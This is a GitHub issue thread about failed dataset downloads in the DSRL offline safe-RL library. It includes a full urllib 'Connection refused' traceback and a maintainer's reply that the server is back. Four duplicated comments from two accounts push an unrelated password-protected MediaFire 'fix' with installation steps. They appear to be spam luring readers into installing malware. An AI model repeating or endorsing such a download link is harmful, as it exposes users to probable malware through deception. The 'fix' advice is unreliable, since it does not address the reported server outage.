### ISSUE TITLE
Unable to download any datasets

### ISSUE THREAD

**Issue by richa-verma** [liuzuxin/DSRL#10]
The following is the error trace. Looks like the server is down. Please help:

>>> dataset = env.get_dataset()
Downloading dataset: http://data.offline-saferl.org/download/SafetyWalker2dVelocityGymnasium-v1-300-2729.hdf5 to /home/richa/.dsrl/datasets/SafetyWalker2dVelocityGymnasium-v1-300-2729.hdf5
Traceback (most recent call last):
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 1348, in do_open
    h.request(req.get_method(), req.selector, req.data, headers,
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/http/client.py", line 1283, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/http/client.py", line 1329, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/http/client.py", line 1278, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/http/client.py", line 1038, in _send_output
    self.send(msg)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/http/client.py", line 976, in send
    self.connect()
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/http/client.py", line 942, in connect
    self.sock = self._create_connection(
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/socket.py", line 845, in create_connection
    raise err
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/socket.py", line 833, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/richa/DSRL/dsrl/offline_env.py", line 196, in get_dataset
    h5path = download_dataset_from_url(self.dataset_url)
  File "/home/richa/DSRL/dsrl/offline_env.py", line 48, in download_dataset_from_url
    urllib.request.urlretrieve(dataset_url, dataset_filepath)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 241, in urlretrieve
    with contextlib.closing(urlopen(url, data)) as fp:
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 216, in urlopen
    return opener.open(url, data, timeout)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 519, in open
    response = self._open(req, data)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 536, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 496, in _call_chain
    result = func(*args)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 1377, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "/home/richa/miniconda3/envs/osrl/lib/python3.10/urllib/request.py", line 1351, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [Errno 111] Connection refused>

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by liuzuxin** [comment]
Hi @richa-verma , the server is back now. Thanks for bringing this to our attention.
